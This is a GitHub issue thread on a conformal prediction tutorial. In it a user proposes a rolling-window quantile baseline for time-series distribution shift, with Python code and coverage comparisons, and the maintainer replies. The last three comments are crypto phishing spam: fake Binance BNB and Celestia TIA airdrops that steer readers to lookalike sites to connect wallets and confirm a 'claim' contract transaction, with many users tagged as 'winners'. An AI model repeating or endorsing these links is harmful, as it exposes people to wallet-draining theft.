### ISSUE TITLE
Improved baseline computation for conformal prediction under distribution shift

### ISSUE THREAD

**Issue by orisenbazuru** [aangelopoulos/conformal-prediction#3]
First many thanks for this awesome repo and the tutorial on split conformal prediction. While going through the `conformal prediction under distribution drift` section and the corresponding example `weather prediction with time-series distribution shift`, I noticed that the `naive` implementation for determining $\hat{q}$ uses `expanding window` that takes all scores up to time $t$ and compute the quantile and iterates over $t$
```python
naive_qhats = np.array( [np.quantile(scores[:t], np.ceil((t+1)*(1-alpha))/t, interpolation='higher') for t in range(K+1, scores.shape[0]) ] )

```
But one can think of another approach by using a `rolling window` of fixed window size $K$ (in the example you were using $K=1000$) and then compute the quantile on each of the windows -- I rewrote and tested the function to support both options below

```python
def compute_qhats(scores, alpha, wsize, opt='fixed_window'):
    lst = []
    qlst = []
    K = wsize
    for t in range(K+1, scores.shape[0]):
        if opt == 'fixed_window':
            start = t - K - 1
            nsamples = K + 1 # = t - start = t - (t - wsize -1) = wsize + 1 = K + 1    QED
        elif opt == 'expanding_window':
            start = 0
            nsamples = t
        q_level = np.ceil((nsamples+1)*(1-alpha))/nsamples
        qlst.append(q_level)
        tmp = np.quantile(scores[start:t], q_level, interpolation='higher')
        lst.append(tmp)
        print('start:', start, 'end:', t)
    return np.array(qlst), np.array(lst)
```
Plot of the $\hat{q}_{expandingwindow}$ `expanding` window approach (i.e. `naive` implementation) 
![Screenshot 2022-11-28 at 16 35 04](https://user-images.githubusercontent.com/48712601/204317971-e0854db6-3637-44cb-840f-7d8f93b9998b.png)

vs. the plot for e $\hat{q}_{rollingwindow}$ `rolling` window approach
![Screenshot 2022-11-28 at 16 37 49](https://user-images.githubusercontent.com/48712601/204318627-32b449b0-a240-4290-9ea8-d7e11baac307.png)

If we compare the results to the `weighted` conformal prediction approach
![Screenshot 2022-11-28 at 16 45 05](https://user-images.githubusercontent.com/48712601/204320397-146592ab-f6a8-49b5-9ddc-379a60962260.png)
it is very similar to the `rolling` window but with the cost of additional computation for finding `infimum of q`
$$\hat{q} = inf  \\{ q : \sum^{n}_{i=1} \tilde{w}_i \mathbb{1} \\{s_i \leq q\\}\geq 1- \alpha \\}$$

that requires finding the roots of the expression above after moving the $1-\alpha$ to the left side of the inequality (i am using the generalized expression but in practice we are using the adaptation to window based version in section `5.3`). 
 
Lastly here is the comparison of coverage over time of the three approaches
![Screenshot 2022-11-28 at 17 08 23](https://user-images.githubusercontent.com/48712601/204325689-fd26c8de-d3a0-4424-a67c-2482cbacf589.png)

In fact when computing the overall coverage, the `rolling` window version achieves the best coverage with score `0.900665` vs. `0.8995545` for the `weighted` version.

It might be the case that for this data adding the constraint of finding the infimum does not add much, but overall if the argument of weighted conformal prediction is based on weighting the recent observation in a window then a `sensibly defined` window would be sufficient to counter the drift especially that we are not "learning the weights $w$" but rather fixing them to a uniform across the window in both cases (unless I am missing something here :) ) 

On a separate note, one minor issue in the code is the size of the window K. The way it is coded now it is translated to be K+1 observations used, and in the case of weighted conformal prediction, when computing `qhats` you omit the first observation from the computation. 

Thank you again for your work and effort to make conformal prediction accessible to the masses.

**Comment by aangelopoulos** [comment]
This is great!  Thanks so much for doing all this work.
Let me try and digest it a little bit before commenting.  

The point of `naive` is to be totally naive --- as if we ran conformal assuming there was no distribution shift.

**Comment by orisenbazuru** [comment]
Sure no worries - in case it is helpful, I uploaded the adaptation to your notebook documenting the experiments I referenced above https://gist.github.com/orisenbazuru/72236a74083e48db06daf838b5def0e6

**Comment by aangelopoulos** [comment]
Beautiful, thanks :)

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by oninn** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @bxhuynh, @b-sullender, @hbriese, @wonjeremy, @keksiqc, @sebastiantf, @Bruc3Wayne666

**Comment by NnajiChimuanya** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!NorthHub, @Rickyfacey3, @Linerly, @0xys, @shixm1102, @DeveloperAlly, @PureNukage, @dawnseeker8, @mazu0, @0x00214131812049, @darklost, @mhlangagc, @ibrahimarslann59, @Ken2889, @liuderchi, @takahiro-prog, @ecreeth, @qgzhao, @ads-light1992, @shanelic
